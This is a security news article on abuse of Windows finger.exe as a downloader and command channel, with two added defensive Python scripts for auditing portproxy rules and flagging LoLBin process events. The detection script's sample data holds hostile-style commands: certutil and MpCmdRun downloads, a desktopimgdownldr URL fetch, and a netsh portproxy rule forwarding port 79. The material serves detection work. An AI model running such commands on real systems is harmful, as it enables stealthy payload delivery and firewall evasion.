Another vulnerability has been reported in a Windows 10 system application that allows viruses to be downloaded without detection.
The list of built-in executables in Windows that can download and run malicious code continues to grow, according to Bleeping Computer.
These files are known as living-off-the-land binaries (LoLBins) and are part of the system. They can help attackers bypass security measures for malware without triggering security alerts.
The latest addition to the list is finger.exe, a system application for retrieving information about users of remote computers running the Finger daemon service. Communication uses the Name/Finger network protocol.
Security researcher John Page discovered that the Microsoft Windows TCPIP Finger command can also function as a file downloader and a makeshift command and control server that can be used to send commands and retrieve data from a computer.
According to the researcher, malicious commands that download files and extract data can be disguised as Finger requests so that Windows Defender does not flag the activity as anomalous.
One problem is that port 79, used by the Finger protocol, is often blocked within an organization, the post says.
However, an attacker with sufficient privileges can bypass the restriction by using the Windows NetSh Portproxy, which acts as a port forwarder for the TCP protocol.
This method allows firewall rules to be bypassed and lets the client communicate with servers over unrestricted HTTP ports: Portproxy requests are delivered to the local computer's IP address and then forwarded to the specified host.
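Because a Portproxy forwarder is exactly what lets blocked Finger traffic leave over an HTTP port, a defender's first check on a suspect host is to list the portproxy rules that already exist. The following is an added example, not code from the article or the researcher's tooling: it parses the text printed by `netsh interface portproxy show all` and flags rules that listen on port 79 or rewrite a non-web port onto a web port. The sample output is constructed to resemble that command's layout, so verify the column format against a real host before relying on the parser.

```python
"""Audit netsh portproxy rules for forwarders that could carry Finger traffic.

Added example (not from the article). Parses the output of
`netsh interface portproxy show all`; SAMPLE_OUTPUT below is constructed.
"""
import re
import subprocess
import sys

# Constructed sample resembling `netsh interface portproxy show all` output.
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
127.0.0.1       79          203.0.113.10    80
0.0.0.0         8443        10.0.0.5        8443
"""

# A data row is: listen-address, listen-port, connect-address, connect-port.
RULE_LINE = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")
FINGER_PORT = 79
WEB_PORTS = {80, 443, 8080, 8443}


def parse_portproxy(text):
    """Return one dict per forwarding rule found in the netsh output text."""
    rules = []
    for line in text.splitlines():
        m = RULE_LINE.match(line)
        if m:  # header and separator lines never match (no numeric ports)
            rules.append({
                "listen_addr": m.group(1), "listen_port": int(m.group(2)),
                "connect_addr": m.group(3), "connect_port": int(m.group(4)),
            })
    return rules


def assess(rule):
    """List the reasons a rule deserves a closer look (empty list = nothing odd)."""
    reasons = []
    if rule["listen_port"] == FINGER_PORT:
        reasons.append("listens on the Finger port (79)")
    if rule["connect_port"] in WEB_PORTS and rule["listen_port"] != rule["connect_port"]:
        reasons.append("rewrites port %d onto web port %d"
                       % (rule["listen_port"], rule["connect_port"]))
    return reasons


def audit(text):
    """Pair every parsed rule with its assessment."""
    return [(rule, assess(rule)) for rule in parse_portproxy(text)]


def collect_output():
    """Run netsh on Windows; elsewhere fall back to the constructed sample."""
    if sys.platform == "win32":
        proc = subprocess.run(["netsh", "interface", "portproxy", "show", "all"],
                              capture_output=True, text=True, check=False)
        return proc.stdout
    return SAMPLE_OUTPUT


if __name__ == "__main__":
    for rule, reasons in audit(collect_output()):
        status = "; ".join(reasons) if reasons else "no finding"
        print("%(listen_addr)s:%(listen_port)d -> %(connect_addr)s:%(connect_port)d"
              % rule, "|", status)
```

Any portproxy rule on a workstation that has no business forwarding traffic is worth a ticket on its own; the assessment only prioritises the ones that match the pattern described in the post.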
Using finger.exe to download files also has limitations, but the upside is that it’s hard to detect, since Base64-encoding the files is enough to avoid detection.
Demo scripts available
The researcher created proof-of-concept (PoC) demo scripts, DarkFinger.py and DarkFinger-Agent.bat, and published them to demonstrate this dual functionality of finger.exe.
In a video showing how the scripts work, Page compared his newly discovered method to certutil.exe, another LoLBin on Windows used for malicious purposes.
Windows Defender stopped the certutil action and logged an event, while the DarkFinger script performed the action without interruption on a Windows 10 machine.
Last year's Cisco Talos report listed 13 LoLBins on Windows; however, security researchers have since discovered new executables that fit the bill.
One of the most recent ones reported on BleepingComputer is none other than the Windows Defender antivirus built into Windows, which can download arbitrary files with a DownloadFile command-line argument added in version 4.18.2007.9 or 4.18.2009.9.
The other is desktopimgdownldr.exe, an executable file found in the Windows 10 system32 directory that is part of the Personalization CSP to change the lock screen and desktop backgrounds. We have already talked about it in detail.
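The common thread across the finger.exe write-up above and the other LoLBins in this list is that a signed system binary is doing something its normal users never ask of it, so process-creation telemetry is the place to catch it. The following is an added example, not code from the article, Cisco Talos or the researcher: a small rule set run over constructed process-creation events (a simplified `Image | CommandLine | ParentImage` form loosely modelled on Sysmon Event ID 1). The Defender rule matches MpCmdRun.exe, the command-line utility that carries the DownloadFile argument; that binary name is not on the page but is the Defender tool in question. Host names and paths in the sample events are placeholders.

```python
"""Flag process-creation events involving the LoLBins named in the article.

Added example (not from the article). Events are constructed in a simplified
"Image | CommandLine | ParentImage" form; adapt parse_event() to your source.
"""
import re

# Constructed sample events: a mix of benign and suspicious activity.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\svchost.exe | svchost.exe -k netsvcs | C:\Windows\System32\services.exe",
    r"C:\Windows\System32\finger.exe | finger.exe user@host.example | C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\netsh.exe | netsh interface portproxy add v4tov4 listenport=79 connectport=80 connectaddress=host.example | C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\certutil.exe | certutil -urlcache -split -f http://host.example/file.txt file.txt | C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\certutil.exe | certutil -verify cert.cer | C:\Windows\System32\cmd.exe",
    r"C:\Program Files\Windows Defender\MpCmdRun.exe | MpCmdRun.exe -DownloadFile -url http://host.example/file.txt -path C:\Users\Public\file.txt | C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\desktopimgdownldr.exe | desktopimgdownldr.exe /lockscreenurl:http://host.example/file.txt | C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\notepad.exe | notepad.exe C:\notes.txt | C:\Windows\explorer.exe",
]

# (rule name, regex on the image path, optional regex on the command line).
# All matching is case-insensitive; a None command-line pattern means any
# execution of that binary is reported.
RULES = [
    ("finger.exe executed (LoLBin downloader / makeshift C2 channel)",
     r"\\finger\.exe$", None),
    ("netsh portproxy rule added (TCP port forwarder)",
     r"\\netsh\.exe$", r"\bportproxy\b.*\badd\b"),
    ("certutil used to fetch or decode a file",
     r"\\certutil\.exe$", r"-urlcache|-decode"),
    ("Windows Defender MpCmdRun DownloadFile",
     r"\\mpcmdrun\.exe$", r"-downloadfile"),
    ("desktopimgdownldr.exe fetching a URL",
     r"\\desktopimgdownldr\.exe$", r"https?://"),
]


def parse_event(line):
    """Split one constructed event into its three fields."""
    image, cmdline, parent = (part.strip() for part in line.split(" | ", 2))
    return {"image": image, "cmdline": cmdline, "parent": parent}


def scan(events):
    """Return (rule, image, cmdline, parent) for every event that trips a rule."""
    hits = []
    for line in events:
        ev = parse_event(line)
        for name, image_re, cmd_re in RULES:
            if not re.search(image_re, ev["image"], re.IGNORECASE):
                continue
            if cmd_re and not re.search(cmd_re, ev["cmdline"], re.IGNORECASE):
                continue
            hits.append((name, ev["image"], ev["cmdline"], ev["parent"]))
    return hits


if __name__ == "__main__":
    for name, image, cmdline, parent in scan(SAMPLE_EVENTS):
        print("[%s]\n    %s\n    parent: %s" % (name, cmdline, parent))
```

The parent image is carried through because it is the cheapest triage signal: finger.exe or certutil spawned by an interactive shell or an Office process is a very different event from the same binary started by a management agent.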